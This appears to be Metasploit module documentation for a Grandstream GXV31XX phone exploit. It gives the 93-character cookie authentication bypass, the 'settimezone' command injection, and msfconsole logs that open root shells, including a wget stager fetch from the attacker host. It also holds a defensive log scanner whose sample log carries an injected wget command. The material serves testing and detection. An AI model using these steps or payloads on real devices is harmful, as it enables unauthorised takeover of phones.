## Vulnerable Application

This module exploits a command injection vulnerability in Grandstream GXV31XX
IP multimedia phones. The 'settimezone' action does not validate the value of
the 'timezone' parameter before using it, allowing injection of arbitrary shell
commands.

A buffer overflow in the 'phonecookie' cookie parsing allows authentication
to be bypassed by supplying an alphanumeric 'phonecookie' value exactly 93
characters long, so the command injection can be triggered without credentials.

This module was tested successfully on Grandstream models:

* GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19; and
* GXV3140 hardware revision V0.4B with firmware version 1.0.1.27.
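The two primitives described above, an unvalidated 'timezone' value and a 93-character alphanumeric 'phonecookie', are easy to look for in web-server logs from these phones. The following Python script is an added example, not code from this module or the Metasploit project: it pairs the allowlist check a hardened settimezone handler would apply with a log scanner that flags requests matching either primitive. The '/manager' path, the 'action=settimezone&timezone=' query-string layout, the access-log line format and the allowlist regex are all assumptions made for the example, and the log lines are constructed; only the action name, parameter name, cookie name and the 93-character length come from the description above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Shell metacharacters that turn a 'timezone' value into a second command.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\r]")

# Assumed allowlist for a legitimate tz string such as "America/Chicago" or
# "Etc/GMT+5"; this is an illustrative check, not the firmware's own logic.
TZ_ALLOWED = re.compile(r"^[A-Za-z0-9_+\-/]{1,64}$")

# The bypass described above: exactly 93 alphanumeric characters in 'phonecookie'.
PHONECOOKIE_BYPASS = re.compile(r"^[A-Za-z0-9]{93}$")

# Assumed access-log layout (constructed for this example):
#   <client> "<method> <path> <proto>" "<Cookie header>"
LOG_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" "([^"]*)"$')


def is_safe_timezone(value: str) -> bool:
    """Allowlist check a hardened settimezone handler would apply before use."""
    return bool(TZ_ALLOWED.match(value))


def parse_cookies(header: str) -> dict:
    """Minimal Cookie header parser: 'a=1; b=2' -> {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def classify_request(path: str, cookie_header: str) -> list:
    """Return indicator tags for one request; an empty list means nothing suspicious."""
    tags = []
    query = parse_qs(urlsplit(path).query)
    action = query.get("action", [""])[0]
    timezone = query.get("timezone", [""])[0]
    if action == "settimezone" and timezone:
        # A value the allowlist rejects, or one carrying shell metacharacters,
        # is the injection primitive the module relies on.
        if SHELL_META.search(timezone) or not is_safe_timezone(timezone):
            tags.append("settimezone-cmd-injection")
    phonecookie = parse_cookies(cookie_header).get("phonecookie", "")
    if PHONECOOKIE_BYPASS.match(phonecookie):
        tags.append("phonecookie-auth-bypass")
    return tags


def scan_log(lines) -> list:
    """Run classify_request over access-log lines and return only the flagged ones."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, cookie_header = m.groups()
        tags = classify_request(path, cookie_header)
        if tags:
            hits.append({"client": client, "path": path, "tags": tags})
    return hits


# Constructed sample log lines. The '/manager' path and the action/timezone
# query-string layout are assumptions; the wget URL mirrors the stager request
# shown in the GXV3175v2 scenario on this page.
SAMPLE_LOG = [
    '10.1.1.112 "GET /manager?action=settimezone&timezone=America%2FChicago HTTP/1.1" '
    '"phonecookie=user1session"',
    '10.1.1.112 "GET /manager?action=settimezone&timezone=GMT%3Bwget+http%3A%2F%2F'
    '10.1.1.110%3A8080%2FJF62dexHKN8b HTTP/1.1" "phonecookie=' + "A" * 93 + '"',
    '10.1.1.112 "GET /manager?action=status HTTP/1.1" "phonecookie=' + "b" * 93 + '"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["tags"], hit["path"])
```

Run against the constructed log, the second line is flagged for both the injected `;wget ...` command and the 93-character cookie, and the third line for the cookie alone; a benign `America/Chicago` request with a normal cookie produces no hit. On a real device the log format and request layout will differ, so adjust `LOG_RE` and the query-string handling before deploying the checks.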

## Verification Steps

1. `msfconsole`
1. `use exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec`
1. `set rhosts [IP]`
1. `set target [target]`
1. `run`
1. You should get a session

## Options


## Scenarios

### Grandstream GXV3140

```
msf6 > use exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec
[*] Using configured payload linux/armle/meterpreter_reverse_tcp
msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set rhosts 10.1.1.111
rhosts => 10.1.1.111
msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > run

[*] Started bind TCP handler against 10.1.1.111:4444
[*] Command shell session 1 opened (10.1.1.112:36769 -> 10.1.1.111:4444 ) at 2022-01-29 02:30:13 -0500


Shell Banner:
_!_
-----


/ # uname -a
uname -a
Linux gxv3140_000b8229ac36 2.6.10_gxv31xx #15 Tue Jul 16 11:07:04 CDT 2013 armv5tejl unknown
/ #

```

### Grandstream GXV3175v2

```
msf6 > use exploit/linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec
[*] Using configured payload linux/armle/meterpreter_reverse_tcp
msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set rhosts 10.1.1.109
rhosts => 10.1.1.109
msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set lhost 10.1.1.110
lhost => 10.1.1.110
msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > set target 1
target => 1
msf6 exploit(linux/http/grandstream_gxv31xx_settimezone_unauth_cmd_exec) > run

[*] Started reverse TCP handler on 10.1.1.110:4444 
[*] Using URL: http://0.0.0.0:8080/JF62dexHKN8b
[*] Local IP: http://10.1.1.110:8080/JF62dexHKN8b
[*] Client 10.1.1.109 (Wget/1.10.1) requested /JF62dexHKN8b
[*] Sending payload to 10.1.1.109 (Wget/1.10.1)
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Meterpreter session 1 opened (10.1.1.110:4444 -> 10.1.1.109:39371 ) at 2022-01-08 13:27:44 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo 
Computer     : 10.1.1.109
OS           :  (Linux 2.6.32_gxv3170v2)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter >
```
